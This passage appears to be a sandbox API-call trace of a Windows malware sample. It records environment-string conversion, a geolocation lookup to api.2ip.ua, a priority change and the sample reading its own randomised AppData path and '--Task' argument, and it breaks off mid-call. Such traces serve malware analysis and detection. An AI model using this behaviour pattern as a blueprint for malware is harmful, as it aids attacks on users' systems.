lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0158.596] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x69) returned 0xcf0ac8 [0158.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0xcf0ac8, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.597] SetLastError (dwErrCode=0x0) [0158.597] GetLastError () returned 0x0 [0158.597] SetLastError (dwErrCode=0x0) [0158.597] GetLastError () returned 0x0 [0158.597] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a80, Size=0x40) returned 0xcf0a80 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0158.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3e) returned 0xce59d8 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0xce59d8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0158.597] GetLastError () returned 0x0 [0158.597] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a80, Size=0x44) returned 0xcf0b40 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0158.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1b) returned 0xcef0f8 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0xcef0f8, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0158.597] GetLastError () returned 0x0 [0158.597] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x48) returned 0xcf0b40 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0158.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1d) returned 0xcef120 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0xcef120, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0158.597] GetLastError () returned 0x0 [0158.597] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x4c) returned 0xcf0b40 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0158.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x48) returned 0xce6d70 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0xce6d70, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0158.597] GetLastError () returned 0x0 [0158.597] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x50) returned 0xcf0b40 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0158.597] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x12) returned 0xcf0a20 [0158.597] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0xcf0a20, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x54) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x18) returned 0xcf0a40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5504", cchWideChar=-1, lpMultiByteStr=0xcf0a40, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5504", lpUsedDefaultChar=0x0) returned 24 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x58) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1b) returned 0xcef148 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0xcef148, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x5c) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x24) returned 0xceac00 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0xceac00, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x60) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x29) returned 0xceb310 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0xceb310, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x64) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1e) returned 0xcef170 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0xcef170, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x68) returned 0xcf0b40 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0158.598] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x41) returned 0xce6dc0 [0158.598] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0xce6dc0, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0158.598] GetLastError () returned 0x0 [0158.598] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x6c) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x17) returned 0xcf0a80 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0xcf0a80, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x70) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0xf) returned 0xcee870 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0xcee870, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x74) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x16) returned 0xcf0aa0 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0xcf0aa0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x78) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2a) returned 0xceb348 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0xceb348, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x7c) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x29) returned 0xceb380 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0xceb380, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x80) returned 0xcf0b40 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0158.599] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x15) returned 0xcf0bc8 [0158.599] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xcf0bc8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0158.599] GetLastError () returned 0x0 [0158.599] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0b40, Size=0x84) returned 0xcf0be8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0158.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x1e) returned 0xcef198 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xcef198, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0158.600] GetLastError () returned 0x0 [0158.600] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0be8, Size=0x88) returned 0xcf0be8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0158.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x2a) returned 0xceb3b8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xceb3b8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0158.600] GetLastError () returned 0x0 [0158.600] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0be8, Size=0x8c) returned 0xcf0be8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0158.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x12) returned 0xcf0b40 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0xcf0b40, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0158.600] GetLastError () returned 0x0 [0158.600] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0be8, Size=0x90) returned 0xcf0be8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0158.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x18) returned 0xcf0b60 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0xcf0b60, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0158.600] GetLastError () returned 0x0 [0158.600] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0be8, Size=0x94) returned 0xcf0be8 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0158.600] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x46) returned 0xce6e10 [0158.600] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0xce6e10, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0158.600] GetLastError () returned 0x0 [0158.600] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0be8, Size=0x98) returned 0xcf0be8 [0158.600] GetLastError () returned 0x0 [0158.600] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.601] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.601] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8ec) returned 0xcf0c88 [0158.601] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.601] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0xcee888 [0158.601] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.602] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.602] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.602] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e10) returned 0x80 [0158.602] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0158.654] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0xce5bd0 [0158.654] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0162.600] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18b588, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18dd88 | out: lpBuffer=0x18b588*, lpdwNumberOfBytesRead=0x18dd88*=0x1df) returned 1 [0162.601] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0162.602] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0162.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0xcfc058 [0162.602] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1e0) returned 0x35fd558 [0162.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd558 | out: hHeap=0xcd0000) returned 1 [0162.602] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xcfc058 | out: hHeap=0xcd0000) returned 1 [0162.603] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xce5bd0 | out: hHeap=0xcd0000) returned 1 [0162.603] GetCurrentProcess () returned 0xffffffff [0162.603] GetLastError () returned 0x2 [0162.603] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0162.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0xd1c780 [0162.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8ec) returned 0x35f7338 [0162.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x35fc3f0 [0162.603] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35fc3f0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\onb5h0yx46mrevq4.exe")) returned 0x65 [0162.603] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c") returned 1 [0162.603] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x369b630 [0162.603] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task" [0162.603] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task", pNumArgs=0x18de68 | out: pNumArgs=0x18de68) returned 0x361c0a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" [0162.604] lstrcpyW (in: lpString1=0x18eaf8, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe" [0162.604] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\ea2f22f9-d502-4d6e-b556-7aab02299e6c\\OnB5h0yX46mreVq4.exe\" --Task" [0162.604] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS 